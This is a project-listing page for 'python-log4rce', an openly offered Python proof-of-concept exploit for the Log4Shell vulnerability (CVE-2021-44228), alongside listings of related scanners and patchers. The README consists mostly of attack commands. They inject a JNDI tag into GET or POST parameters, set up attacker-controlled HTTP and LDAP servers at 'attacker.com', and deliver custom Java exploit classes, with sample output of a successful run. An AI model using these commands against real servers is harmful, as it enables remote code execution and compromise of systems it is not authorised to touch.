Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details

All Projects → alexandre-lavoie → python-log4rce

alexandre-lavoie / python-log4rce

Licence: MIT license

An All-In-One Pure Python PoC for CVE-2021-44228

Programming Languages

139335 projects - #7 most used programming language

68154 projects - #9 most used programming language

Labels

cli log4j rce cve-2021-44228

Projects that are alternatives of or similar to python-log4rce

log4j rce test environment and poc

Stars: ✭ 306 (+70.95%)

Mutual labels: log4j, rce, cve-2021-44228

Log4j-RCE-Scanner

Remote command execution vulnerability scanner for Log4j.

Stars: ✭ 200 (+11.73%)

Mutual labels: log4j, rce, cve-2021-44228

cloudrasp-log4j2

一个针对防御 log4j2 CVE-2021-44228 漏洞的 RASP 工具。 A Runtime Application Self-Protection module specifically designed for log4j2 RCE (CVE-2021-44228) defense.

Stars: ✭ 105 (-41.34%)

Mutual labels: log4j, rce, cve-2021-44228

log4j-scanner is a project derived from other members of the open-source community by CISA to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.

Stars: ✭ 1,212 (+577.09%)

Mutual labels: log4j, cve-2021-44228

Nmap Log4Shell NSE script for discovery Apache Log4j RCE (CVE-2021-44228)

Stars: ✭ 54 (-69.83%)

Mutual labels: log4j, cve-2021-44228

Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too!

Stars: ✭ 622 (+247.49%)

Mutual labels: log4j, cve-2021-44228

《HackLog4j-永恒之恶龙》致敬全宇宙最无敌的Java日志库！Tribute to the most invincible Java logging library in the universe!

Stars: ✭ 161 (-10.06%)

Mutual labels: log4j, cve-2021-44228

log4shell-finder

Fastest filesystem scanner for log4shell (CVE-2021-44228, CVE-2021-45046) and other vulnerable (CVE-2017-5645, CVE-2019-17571, CVE-2022-23305, CVE-2022-23307 ... ) instances of log4j library. Excellent performance and low memory footprint.

Stars: ✭ 22 (-87.71%)

Mutual labels: log4j, cve-2021-44228

log4shell-tools

Tool that runs a test to check whether one of your applications is affected by the recent vulnerabilities in log4j: CVE-2021-44228 and CVE-2021-45046

Stars: ✭ 55 (-69.27%)

Mutual labels: log4j, cve-2021-44228

Log4j Vulnerability Scanner for Windows

Stars: ✭ 142 (-20.67%)

Mutual labels: log4j, cve-2021-44228

awesome-list-of-secrets-in-environment-variables

🦄🔒 Awesome list of secrets in environment variables 🖥️

Stars: ✭ 538 (+200.56%)

Mutual labels: log4j, cve-2021-44228

A tool that scans archives to check for vulnerable log4j versions

Stars: ✭ 180 (+0.56%)

Mutual labels: log4j, cve-2021-44228

CVE-2021-44228-PoC-log4j-bypass-words

🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks

Stars: ✭ 760 (+324.58%)

Mutual labels: log4j, cve-2021-44228

Log4j Shield - fast ⚡, scalable and easy to use Log4j vulnerability CVE-2021-44228 finder and patcher

Stars: ✭ 13 (-92.74%)

Mutual labels: log4j, cve-2021-44228

log4j-shell-poc

A Proof-Of-Concept for the CVE-2021-44228 vulnerability.

Stars: ✭ 1,536 (+758.1%)

Mutual labels: log4j, cve-2021-44228

log4j-cve-2021-44228

Ansible detector scanner playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 Remote Code Execution - log4j (CVE-2021-44228)

Stars: ✭ 58 (-67.6%)

Mutual labels: log4j, cve-2021-44228

A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)

Stars: ✭ 43 (-75.98%)

Mutual labels: log4j, cve-2021-44228

log4shelldetect

Rapidly scan filesystems for Java programs potentially vulnerable to Log4Shell (CVE-2021-44228) or "that Log4j JNDI exploit" by inspecting the class paths inside files

Stars: ✭ 40 (-77.65%)

Mutual labels: log4j, cve-2021-44228

A fully automated, reliable, super-fast, mass scanning and validation toolkit for the Log4J RCE CVE-2021-44228 vulnerability.

Stars: ✭ 362 (+102.23%)

Mutual labels: log4j, cve-2021-44228

log4j-log4shell-affected

Lists of affected components and affected apps/vendors by CVE-2021-44228 (aka Log4shell or Log4j RCE). This list is meant as a resource for security responders to be able to find and address the vulnerability

Stars: ✭ 49 (-72.63%)

Mutual labels: log4j, cve-2021-44228

View All Similar Projects ➔

Python Log4RCE

An all-in-one pure Python3 PoC for CVE-2021-44228.

Sample

> python3 log4rce.py --target "linux" --payload "PAYLOAD" http -X POST --url "http://localhost:8080/" --data "address=###"

INFO:HTTP:Running on local port 1337
INFO:HTTP:Remote target is http://127.0.0.1:1337/LinuxExploit.class
INFO:LDAP:Running on local port 1387
INFO:Log4J:Sending payload to http://localhost:8080/
INFO:LDAP:Query from ('127.0.0.1', 42554)
INFO:HTTP:Request from ('127.0.0.1', 55328) to /LinuxExploit.class
INFO:Log4J:Done!

Usage

This is a CLI tool. All options can be found in the help menu:

python3 log4rce.py --help

The list is pretty extensive, therefore the following will give you a summary of the functionality.

Attack Modes

The tool allows you to use a few attack modes. These attacks are extensions of the Log4RCE class.

HTTP

You can perform an automated HTTP request attack on a target URL.

You can perform a GET request as follows:

python3 log4rce.py http --url "http://www.vuln.com:1234/?vuln_param=###&param=123" --headers="P1=123&P2=123"

You can perform a POST request as follows:

python3 log4rce.py http -X POST --url "http://www.vuln.com:1234/" --data "vuln_param=###&param=123" --headers="P1=123&P2=123"

The previous will inject the JNDI tag into ###.

Manual

If you cannot use any of the previous, use this mode to dump the JDNI tag:

python3 log4rce.py manual

Network Settings

The tool allows extensive customization for most network configuration. All the internal servers can be modified to point to different locations according the the remote settings.

HTTP Server

You can configure the HTTP server using the following parameters:

python3 log4rce.py --http_port 1234 --http_rport 12345 --http_host "attacker.com"

http_port: The local port to run the server on.
http_rport: The port that a remote machine accesses.
http_host: The host name/IP a remote machine accesses.

LDAP Server

You can configure the LDAP server using the following parameters:

python3 log4rce.py --ldap_port 1234 --ldap_rport 12345 --ldap_host "attacker.com"

ldap_port: The local port to run the server on.
ldap_rport: The port that a remote machine accesses.
ldap_host: The host name/IP a remote machine accesses.

Customization

The tool allows can handle some customization. The following lists some functionality you may be interested in.

Injecting Payload

You can inject a payload into the Java class using:

python3 log4rce.py --payload "PAYLOAD"

The payload will be injected into "###" strings.

Custom Java Payload

You can build your own Java class using the following.

javac -source 1.7 -target 1.7 /path/to/Exploit.java

The resulting .class can be run using:

python3 log4rce.py --java_class "/path/to/Exploit.class" ...

Note: You can add a string "###" to allow payload injection.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].

Stars: ✭ 179

Visit Git Page 🔗Visit User Page 🔗Visit Issues Page (0) 🔗